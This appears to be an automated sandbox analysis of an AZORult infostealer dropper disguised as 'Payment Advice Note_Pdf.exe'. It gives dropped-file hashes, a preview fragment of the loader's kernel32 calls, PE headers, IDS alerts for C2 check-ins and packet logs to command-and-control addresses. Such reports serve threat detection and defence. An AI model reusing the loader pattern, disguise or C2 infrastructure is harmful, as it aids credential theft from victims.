Preview:	..CCC....44..c............D..................P.gg.....1........WWWWW............h..........Z...k...e.{.r...n...e...l...3...2...:...:...C...r...e...a...t...e...F...i...l...e...A...(...m... ...r.[.4... ...,... ...i... ...0...x...8...0..I0...0...0..{0...0...0...,.DD .11i... ...0...,... ...p... ...0...,... .}}i... ...4...,... ...i..F ...0...x...8...0...,... ...i... ...0...)...i.......r..W8.......k...e...r...n...e...l.v.3...2...:...:...S...e...t...F.V.i..tl...e...P...o...i...n..Nt...e...r...(...i... ...r...8...,... ...i... ...2.N.3...0...1...2... ...,... ...i... ...0...,...i... ...0...)...i.......r...4..r....k...e...r...n...e...l...3.j.2..g:..P:...V...i...r...t..;u...a...l...A...l...l...o...c...(...i... ...0...,...i... ...6...2...0...2.jj5...7...2...8...,... ...i... ...0...x...3.mm0...0.\|.0...,... .ppi... ...0..xx...4.NN0...)...p.......r...2.......k.p.e...r...n...e.@.l...3...2...:...:.''R..Be...a...d../F...i...l.9.e...(...i... ..+r...8...,... ...i... .[[r...2...,... ...i... ...6...2...0...2

C:\Users\user\toenailed\quoteworthy\Atoning\balow.kni

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	416382
Entropy (8bit):	1.2495705753284567
Encrypted:	false
SSDEEP:	1536:7KREo0lzgMe310b9TzS9twkAZJgKBUM63hnY:dJpbdzZZ/4Y
MD5:	06C9A3EE7A0FD6195CB414C2F80F3C07
SHA1:	4E5FD3045FB079134EC8CED9E03CE3EDD9DE9CD1
SHA-256:	6FAA52316DDA15E50674EF44E56764E556CBE244B6FB85D02A91AFDD0691BBC3
SHA-512:	3F2F79A6C3AA3E7DEDFC44BDCDDE1B03750DB5595109FE275C9680E82B986E95A82D889FB0F3469C66376295ED5E4C0F0B388B1A8A084E53DDF92A3C5D935AB4
Malicious:	false
Preview:	...... ...................{....`...............L......................b..............{.....;...................K.....................................p....=.........Z..........=.-...................................................q..................s............j.........................l........................................................................................J.....................................................T............................h............K........................................j..........................D.......F..............?.................................t..........................................................................Q.....................5......!..........s..............................l>.............................".......,....9........b.................................;...>.............9......................................................[........._.(...........a...............w......B..................................'.............

C:\Users\user\toenailed\quoteworthy\Atoning\hydrokinetic.und

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	338835
Entropy (8bit):	1.2648819424128788
Encrypted:	false
SSDEEP:	1536:CNWayx+X7MuLlST1PIH+SNw95RbyB+XJ7el:CNWaysrMDThIH+SKRy8XJ7a
MD5:	A464F61DA0F07724116E1738AC316B46
SHA1:	271F18FE9BCF230FB5F64A5DADED00CC33FE829C
SHA-256:	CF71070A17E86D26980016788925F140195670017BE836829C87AD7A4CC611F5
SHA-512:	D6B5F5277B1BE88380FE5ECECB666A1218C5F3D86C5B011AAC24A12764337F3ACCBCFDF542838884937A6A82ACCD1DAB90299CE90DC155CEE4F9F357434A4F9B
Malicious:	false
Preview:	.................................................................................6.....................)............................................................................................................................L.....................\...(...z.................&.............r...2.........................................................(................A.......................U...p...\......................................c...5..#,......w.....................................m....................[.....y............d....^........h..................P...........................C...................................................................6................................................f...................................>...........................................................................q................................E.....................\.....................................Z..............................0....................]...............................

C:\Users\user\toenailed\quoteworthy\Atoning\rundkreds.non

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	484049
Entropy (8bit):	1.2474575863664674
Encrypted:	false
SSDEEP:	1536:/Oafsm3uOF+wSvpkmEYlfhgMukF3uGtBLEC2vpjID:0olo5YRwHBLgG
MD5:	1C4250484F739347A747ACC805B07D7B
SHA1:	2E0C8E29D5A9B5FAD982B302763134777849FAB3
SHA-256:	94450F51E79E716B3CED97C29716DE471392358E8EC9A775F1B501EAA9F05835
SHA-512:	E8FA6DDA169C5FA097198B5A97BE89ADFB1D5ABC6E97C8F6D82560552A2E2ABCB14A2323ED1CCEBFF1A18DC35320571D8CBC8E8D1274FDA15818E041F37A5BD3
Malicious:	false
Preview:	...............................................................................................................T......U............................................................................]......7.K......................h.........................<......................_.......X.&..9...........................+................................................u.................S............................f....................z....i.......................................r...............................................................................................................C..........&..............................................q...i...................M..................................}...............................9......n......................................&.......`................................!...P....................................>m...........................................,.............~...............................h........................................

C:\Users\user\toenailed\quoteworthy\Atoning\unvociferously.txt

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	ASCII text, with very long lines (337), with no line terminators
Category:	dropped
Size (bytes):	337
Entropy (8bit):	4.179102174055961
Encrypted:	false
SSDEEP:	6:kBYrfwX9SERhMHFUx9PtZ+6MSrf2y7pVAjAbSGQPVymwe1Af:kBYrfwX9S4uHFUx9VHj2ovm/PV9T1Af
MD5:	9E374E52685DB670C625E176548A106B
SHA1:	939FB9411A0119AD339E475BC74D65480EEE1952
SHA-256:	096094B6EA691BAA4A10121BDE3F995A5D2B797F9470784383B2878794476169
SHA-512:	3F57C3A4713B33D548C353D67325E2192339E89DA04578FA33B37856A201ED646BB4E75AADBCB302EA2A08BBB239D06FCDD0F406C960C241C0B5F2D1F4C92B2D
Malicious:	false
Preview:	otti stallard dudgeon.efterslagenes cykelsporten girthed ansaml.honninger attestmkr eklektikerens supraoccipital antinegro gastronoms,ramie anskaffelsessummernes spicy unsuperlatively udraderinger afgiftsprovenuer.greifs neurosurgeon dioptomiter cordonnet konservativt.dyvlerne processioning grnsedragningens idehistories appendicostomy,

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.90128411546846
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Payment Advice Note_Pdf.exe
File size:	547'272 bytes
MD5:	6252d288d82fa00e65d3ba32bdc53411
SHA1:	c9c0c3e7d495ad742c76260964810ed5f0b82cd1
SHA256:	9f2aca94590b9f367108ce3db9f0c67d35e884f1f254fb7f761e00f2c905bdcf
SHA512:	a95891e8802ee52688039a92d9b364369808ec3f280435d9b69d4ed8231ac09e5d49e3ca099d7838774d116ae2b3ccd0a9341abbc075dc22899f3d9752549812
SSDEEP:	12288:LBbNp71fn454+U71RZfiRufiWvCwr5ym2FV0:l1fn454+kDKQ9qW5yi
TLSH:	92C413046BC0E47FD18A07F2A976CCEA97F9AD146C78154B9B583F1F2BB45D64834382
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P.._...P...P..NP.._...P...s...P...V...P..Rich.P..........................PE..L...s..V.................`...*.....

File Icon


Icon Hash:	1ba5195934341e01

Static PE Info

General

Entrypoint:	0x40326a
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x567F8473 [Sun Dec 27 06:25:55 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	d4b94e8ee3f620a89d114b9da4b31873

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN="Forebringelse Tornysterets Casco ", E=Ceriman@flyvesikringstje.Cal, L=Oevenum, S=Schleswig-Holstein, C=DE
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	08/03/2024 07:28:45 08/03/2027 07:28:45
Subject Chain	CN="Forebringelse Tornysterets Casco ", E=Ceriman@flyvesikringstje.Cal, L=Oevenum, S=Schleswig-Holstein, C=DE
Version:	3
Thumbprint MD5:	D16302FAA5120FA01A90DC22AE53652E
Thumbprint SHA-1:	DE8E41201EBD7D989078309BF3A1332475BBF99A
Thumbprint SHA-256:	1FBF5948ADFD3306B3CFB6F1033587C29A39C90AD5906EC7D4A98960944ED9FB
Serial:	034E3AA3A5AC53D8FFC61DFBC56ECEBB95672C22

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebp
push esi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+0Ch], ebp
push 00008001h
mov dword ptr [esp+0Ch], 00409300h
mov dword ptr [esp+18h], ebp
call dword ptr [004070B0h]
call dword ptr [004070ACh]
cmp ax, 00000006h
je 00007FB8915C5F83h
push ebp
call 00007FB8915C90C6h
cmp eax, ebp
je 00007FB8915C5F79h
push 00000C00h
call eax
push ebx
push edi
push 004092F4h
call 00007FB8915C9043h
push 004092ECh
call 00007FB8915C9039h
push 004092E0h
call 00007FB8915C902Fh
push 00000009h
call 00007FB8915C9094h
push 00000007h
call 00007FB8915C908Dh
mov dword ptr [00429224h], eax
call dword ptr [00407044h]
push ebp
call dword ptr [004072A8h]
mov dword ptr [004292D8h], eax
push ebp
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebp
push 004206C8h
call dword ptr [0040718Ch]
push 004092C8h
push 00428220h
call 00007FB8915C8C7Ah
call dword ptr [004070A8h]
mov ebx, 00434000h
push eax
push ebx
call 00007FB8915C8C68h
push ebp
call dword ptr [00407178h]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x74bc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x53000	0x1c138	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x84fe0	0x9e8
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x2b8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5ffa	0x6000	df2f822ba33541e61d4a603b60bbdbcc	False	0.6675211588541666	data	6.472885474718374	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1370	0x1400	a10c5fabf76461b1b26713fde2284808	False	0.4404296875	data	5.0714431097950134	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x20318	0x600	45bc104aba688d708375b6b0133d1563	False	0.5084635416666666	data	3.9955723529870646	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2a000	0x29000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x53000	0x1c138	0x1c200	3aaaaa77b549062d64eb9f7ce1ec32f6	False	0.8571614583333333	data	7.468497984201186	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x53418	0x9ea6	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9971438420249176
RT_ICON	0x5d2c0	0x79a0	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9909108427543679
RT_ICON	0x64c60	0x39b9	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.984367598294647
RT_ICON	0x68620	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.4028008298755187
RT_ICON	0x6abc8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.4594277673545966
RT_ICON	0x6bc70	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.535181236673774
RT_ICON	0x6cb18	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.6588447653429603
RT_ICON	0x6d3c0	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.3628048780487805
RT_ICON	0x6da28	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.4458092485549133
RT_ICON	0x6df90	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6134751773049646
RT_ICON	0x6e3f8	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.4596774193548387
RT_ICON	0x6e6e0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.5236486486486487
RT_DIALOG	0x6e808	0x100	data	English	United States	0.5234375
RT_DIALOG	0x6e908	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x6ea28	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x6eaf0	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x6eb50	0xae	data	English	United States	0.6091954022988506
RT_VERSION	0x6ec00	0x1f8	data	English	United States	0.5456349206349206
RT_MANIFEST	0x6edf8	0x33f	XML 1.0 document, ASCII text, with very long lines (831), with no line terminators	English	United States	0.5547533092659447

Imports

DLL	Import
KERNEL32.dll	SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, LoadLibraryW, GetProcAddress, GetModuleHandleA, ExpandEnvironmentStringsW, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, GlobalFree, lstrcmpW, GlobalAlloc, WaitForSingleObject, GlobalUnlock, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, GetDC, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, LoadImageW, SetWindowLongW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, SetTimer, FindWindowExW, SendMessageTimeoutW, SetForegroundWindow
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll	RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-30T15:10:10.639148+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.11.20	49753	172.93.121.126	443	TCP
2024-09-30T15:10:13.091884+0200	2029468	ET MALWARE Win32/AZORult V3.3 Client Checkin M15	1	192.168.11.20	49754	172.67.215.93	80	TCP
2024-09-30T15:10:13.091884+0200	2810276	ETPRO MALWARE AZORult CnC Beacon M1	1	192.168.11.20	49754	172.67.215.93	80	TCP
2024-09-30T15:10:13.347682+0200	2029138	ET MALWARE AZORult v3.3 Server Response M3	1	172.67.215.93	80	192.168.11.20	49754	TCP
2024-09-30T15:10:20.388178+0200	2029468	ET MALWARE Win32/AZORult V3.3 Client Checkin M15	1	192.168.11.20	49755	172.67.215.93	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 30, 2024 15:10:09.763104916 CEST	49753	443	192.168.11.20	172.93.121.126
Sep 30, 2024 15:10:09.763132095 CEST	443	49753	172.93.121.126	192.168.11.20
Sep 30, 2024 15:10:09.763300896 CEST	49753	443	192.168.11.20	172.93.121.126
Sep 30, 2024 15:10:09.773883104 CEST	49753	443	192.168.11.20	172.93.121.126
Sep 30, 2024 15:10:09.773895025 CEST	443	49753	172.93.121.126	192.168.11.20
Sep 30, 2024 15:10:10.211474895 CEST	443	49753	172.93.121.126	192.168.11.20
Sep 30, 2024 15:10:10.211658955 CEST	49753	443	192.168.11.20	172.93.121.126
Sep 30, 2024 15:10:10.211709976 CEST	49753	443	192.168.11.20	172.93.121.126
Sep 30, 2024 15:10:10.264880896 CEST	49753	443	192.168.11.20	172.93.121.126
Sep 30, 2024 15:10:10.264898062 CEST	443	49753	172.93.121.126	192.168.11.20
Sep 30, 2024 15:10:10.265202045 CEST	443	49753	172.93.121.126	192.168.11.20
Sep 30, 2024 15:10:10.265358925 CEST	49753	443	192.168.11.20	172.93.121.126
Sep 30, 2024 15:10:10.267615080 CEST	49753	443	192.168.11.20	172.93.121.126
Sep 30, 2024 15:10:10.312184095 CEST	443	49753	172.93.121.126	192.168.11.20
Sep 30, 2024 15:10:10.639127016 CEST	443	49753	172.93.121.126	192.168.11.20
Sep 30, 2024 15:10:10.639152050 CEST	443	49753	172.93.121.126	192.168.11.20
Sep 30, 2024 15:10:10.639276028 CEST	49753	443	192.168.11.20	172.93.121.126
Sep 30, 2024 15:10:10.639276028 CEST	49753	443	192.168.11.20	172.93.121.126
Sep 30, 2024 15:10:10.639319897 CEST	443	49753	172.93.121.126	192.168.11.20
Sep 30, 2024 15:10:10.639436007 CEST	49753	443	192.168.11.20	172.93.121.126
Sep 30, 2024 15:10:10.639477015 CEST	49753	443	192.168.11.20	172.93.121.126
Sep 30, 2024 15:10:10.848532915 CEST	443	49753	172.93.121.126	192.168.11.20
Sep 30, 2024 15:10:10.848537922 CEST	443	49753	172.93.121.126	192.168.11.20
Sep 30, 2024 15:10:10.848771095 CEST	49753	443	192.168.11.20	172.93.121.126
Sep 30, 2024 15:10:10.848793030 CEST	49753	443	192.168.11.20	172.93.121.126
Sep 30, 2024 15:10:10.855056047 CEST	443	49753	172.93.121.126	192.168.11.20
Sep 30, 2024 15:10:10.855330944 CEST	49753	443	192.168.11.20	172.93.121.126
Sep 30, 2024 15:10:10.861962080 CEST	443	49753	172.93.121.126	192.168.11.20
Sep 30, 2024 15:10:10.862096071 CEST	49753	443	192.168.11.20	172.93.121.126
Sep 30, 2024 15:10:10.862268925 CEST	49753	443	192.168.11.20	172.93.121.126
Sep 30, 2024 15:10:10.893100023 CEST	443	49753	172.93.121.126	192.168.11.20
Sep 30, 2024 15:10:10.893294096 CEST	49753	443	192.168.11.20	172.93.121.126
Sep 30, 2024 15:10:10.893465996 CEST	49753	443	192.168.11.20	172.93.121.126
Sep 30, 2024 15:10:11.069027901 CEST	443	49753	172.93.121.126	192.168.11.20
Sep 30, 2024 15:10:11.069278002 CEST	49753	443	192.168.11.20	172.93.121.126
Sep 30, 2024 15:10:11.075048923 CEST	443	49753	172.93.121.126	192.168.11.20
Sep 30, 2024 15:10:11.075356007 CEST	49753	443	192.168.11.20	172.93.121.126
Sep 30, 2024 15:10:11.081866980 CEST	443	49753	172.93.121.126	192.168.11.20
Sep 30, 2024 15:10:11.082103014 CEST	49753	443	192.168.11.20	172.93.121.126
Sep 30, 2024 15:10:11.090518951 CEST	443	49753	172.93.121.126	192.168.11.20
Sep 30, 2024 15:10:11.090760946 CEST	49753	443	192.168.11.20	172.93.121.126
Sep 30, 2024 15:10:11.097098112 CEST	443	49753	172.93.121.126	192.168.11.20
Sep 30, 2024 15:10:11.097266912 CEST	49753	443	192.168.11.20	172.93.121.126
Sep 30, 2024 15:10:11.097481966 CEST	49753	443	192.168.11.20	172.93.121.126
Sep 30, 2024 15:10:11.106273890 CEST	443	49753	172.93.121.126	192.168.11.20
Sep 30, 2024 15:10:11.106513977 CEST	49753	443	192.168.11.20	172.93.121.126
Sep 30, 2024 15:10:11.149714947 CEST	443	49753	172.93.121.126	192.168.11.20
Sep 30, 2024 15:10:11.149971008 CEST	49753	443	192.168.11.20	172.93.121.126
Sep 30, 2024 15:10:11.280215025 CEST	443	49753	172.93.121.126	192.168.11.20
Sep 30, 2024 15:10:11.280364037 CEST	49753	443	192.168.11.20	172.93.121.126
Sep 30, 2024 15:10:11.280519009 CEST	49753	443	192.168.11.20	172.93.121.126
Sep 30, 2024 15:10:11.287203074 CEST	443	49753	172.93.121.126	192.168.11.20
Sep 30, 2024 15:10:11.287492990 CEST	49753	443	192.168.11.20	172.93.121.126
Sep 30, 2024 15:10:11.288759947 CEST	443	49753	172.93.121.126	192.168.11.20
Sep 30, 2024 15:10:11.288846970 CEST	443	49753	172.93.121.126	192.168.11.20
Sep 30, 2024 15:10:11.289036036 CEST	49753	443	192.168.11.20	172.93.121.126
Sep 30, 2024 15:10:11.289086103 CEST	49753	443	192.168.11.20	172.93.121.126
Sep 30, 2024 15:10:11.289086103 CEST	49753	443	192.168.11.20	172.93.121.126
Sep 30, 2024 15:10:11.289097071 CEST	443	49753	172.93.121.126	192.168.11.20
Sep 30, 2024 15:10:11.289221048 CEST	49753	443	192.168.11.20	172.93.121.126
Sep 30, 2024 15:10:11.577743053 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:11.727382898 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:11.728621006 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:11.728621006 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:11.878253937 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.090967894 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.090985060 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.091002941 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.091013908 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.091026068 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.091037035 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.091048002 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.091121912 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.091166019 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.091269016 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.091283083 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.091295004 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.091587067 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.091764927 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.091777086 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.091883898 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.092267990 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.092267990 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.092643976 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.342802048 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.342818975 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.342959881 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.343003988 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.343069077 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.343087912 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.343087912 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.343138933 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.343152046 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.343259096 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.343259096 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.343476057 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.343640089 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.343698978 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.343722105 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.343745947 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.343827009 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.343875885 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.344357014 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.344372988 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.344419003 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.344432116 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.344737053 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.344908953 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.345541000 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.345591068 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.345608950 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.345633030 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.345931053 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.345931053 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.347218037 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.347306013 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.347363949 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.347387075 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.347412109 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.347461939 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.347482920 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.347502947 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.347552061 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.347552061 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.347681999 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.347723007 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.347723007 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.347786903 CEST	80	49754	172.67.215.93	192.168.11.20
